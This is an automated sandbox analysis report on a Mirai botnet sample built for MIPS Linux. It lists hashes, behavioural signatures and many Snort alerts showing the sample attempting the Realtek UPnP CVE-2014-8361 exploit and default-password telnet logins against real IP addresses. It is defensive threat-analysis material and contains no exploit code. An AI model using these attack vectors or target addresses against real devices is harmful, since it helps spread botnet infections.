Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Linux Analysis Report KHSQ48GkGn

Overview

General Information

Sample Name:KHSQ48GkGn
Analysis ID:513296
MD5:905f7222e4cc69941935cdef4fa16246
SHA1:84210b6c2c580b67c433e56c0d41831ce17bdd74
SHA256:cd091f9f91f748395e30fa49ed2c4fc9e68247d5e9ae08982d5a2fb3ed074280
Tags:32elfmipsmirai
Infos:

Most interesting Screenshot:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Sample tries to kill many processes (SIGKILL)
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:513296
Start date:02.11.2021
Start time:01:50:54
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 44s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:KHSQ48GkGn
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal76.spre.troj.lin@0/2@0/0
Warnings:
Show All
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • KHSQ48GkGn (PID: 5238, Parent: 5121, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/KHSQ48GkGn
  • systemd New Fork (PID: 5281, Parent: 1)
  • sshd (PID: 5281, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5282, Parent: 1)
  • sshd (PID: 5282, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • cleanup

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: KHSQ48GkGnVirustotal: Detection: 62%Perma Link
    Source: KHSQ48GkGnReversingLabs: Detection: 63%

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45302 -> 45.33.240.241:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45302 -> 45.33.240.241:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36880 -> 185.71.66.16:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36880 -> 185.71.66.16:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36826 -> 45.45.156.145:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36826 -> 45.45.156.145:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36884 -> 185.71.66.16:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36830 -> 45.45.156.145:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47072
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47072 -> 87.139.152.191:23
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47072
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47072
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48406 -> 45.127.162.107:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48406 -> 45.127.162.107:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40722 -> 45.43.226.122:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40722 -> 45.43.226.122:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47168
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56652 -> 45.195.8.90:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56652 -> 45.195.8.90:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56678 -> 45.195.8.90:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47168
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47168
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35802 -> 45.207.219.157:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35802 -> 45.207.219.157:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33332
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47250
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49010 -> 91.185.211.67:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49010 -> 91.185.211.67:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49012 -> 91.185.211.67:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47250
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47250
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40756 -> 45.33.254.99:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40756 -> 45.33.254.99:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43210 -> 45.125.110.26:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43210 -> 45.125.110.26:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53236 -> 45.195.13.156:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53236 -> 45.195.13.156:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36088 -> 45.126.230.172:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36088 -> 45.126.230.172:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47282
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59666 -> 45.254.26.176:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59666 -> 45.254.26.176:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:39760
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:39760
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37586 -> 185.147.59.97:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37586 -> 185.147.59.97:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37590 -> 185.147.59.97:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47282
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47282
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46498 -> 91.208.8.173:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46498 -> 91.208.8.173:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46500 -> 91.208.8.173:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44066 -> 45.120.108.140:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44066 -> 45.120.108.140:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58024 -> 45.126.76.207:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58024 -> 45.126.76.207:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44070 -> 45.120.108.140:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57752 -> 45.33.250.239:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57752 -> 45.33.250.239:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47322
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58022 -> 91.76.240.88:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58022 -> 91.76.240.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54360 -> 91.232.198.112:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54360 -> 91.232.198.112:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58028 -> 91.76.240.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54364 -> 91.232.198.112:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47322
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47322
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60496 -> 45.41.80.35:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60496 -> 45.41.80.35:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33212 -> 91.76.242.94:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33212 -> 91.76.242.94:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33216 -> 91.76.242.94:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53420 -> 91.76.222.172:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53420 -> 91.76.222.172:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53424 -> 91.76.222.172:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54844 -> 45.43.228.41:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54844 -> 45.43.228.41:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52918 -> 45.248.69.27:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52918 -> 45.248.69.27:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52928 -> 45.248.69.27:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60648
    Source: TrafficSnort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33510
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47456
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35314 -> 45.42.90.10:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35314 -> 45.42.90.10:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44934 -> 185.131.76.190:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44934 -> 185.131.76.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44938 -> 185.131.76.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42650 -> 91.185.211.113:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42650 -> 91.185.211.113:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47456
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47456
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49750 -> 91.77.196.124:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49750 -> 91.77.196.124:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46228 -> 91.78.64.51:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46228 -> 91.78.64.51:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49754 -> 91.77.196.124:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46234 -> 91.78.64.51:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60808
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 36.77.52.80:23 -> 192.168.2.23:40516
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42296 -> 45.60.186.143:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42296 -> 45.60.186.143:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38252 -> 45.41.95.82:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38252 -> 45.41.95.82:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42300 -> 45.60.186.143:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47594
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:58252 -> 118.167.224.52:23
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60884
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47594
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47594
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36066 -> 185.248.138.86:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36066 -> 185.248.138.86:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36068 -> 185.248.138.86:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52188 -> 91.200.122.74:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34192 -> 45.43.237.141:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34192 -> 45.43.237.141:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47632
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38710 -> 91.78.89.163:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38710 -> 91.78.89.163:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38714 -> 91.78.89.163:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:40116
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:40116
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60922
    Source: TrafficSnort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60922 -> 68.69.24.51:23
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47632
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47632
    Source: TrafficSnort IDS: 716 INFO TELNET access 182.163.50.184:23 -> 192.168.2.23:40682
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42490 -> 45.33.243.135:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42490 -> 45.33.243.135:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34330 -> 45.41.81.233:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34330 -> 45.41.81.233:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53618 -> 45.113.2.225:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53618 -> 45.113.2.225:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47382 -> 185.131.76.111:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47382 -> 185.131.76.111:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47384 -> 185.131.76.111:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51544
    Source: TrafficSnort IDS: 716 INFO TELNET access 87.139.152.191:23 -> 192.168.2.23:47694
    Source: TrafficSnort IDS: 716 INFO TELNET access 103.163.14.189:23 -> 192.168.2.23:33790
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48110 -> 45.195.155.209:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48110 -> 45.195.155.209:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52230 -> 185.216.248.58:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52230 -> 185.216.248.58:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33576 -> 91.200.121.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52238 -> 185.216.248.58:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:60990
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54554
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54554
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51576
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 87.139.152.191:23 -> 192.168.2.23:47694
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 87.139.152.191:23 -> 192.168.2.23:47694
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.29.219.69: -> 192.168.2.23:
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53970 -> 91.121.55.88:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53970 -> 91.121.55.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53976 -> 91.121.55.88:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54542 -> 45.126.247.9:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54542 -> 45.126.247.9:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58138 -> 45.115.236.133:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58138 -> 45.115.236.133:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54550 -> 45.126.247.9:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42806 -> 185.147.59.29:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42806 -> 185.147.59.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42810 -> 185.147.59.29:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33666 -> 45.115.240.160:52869
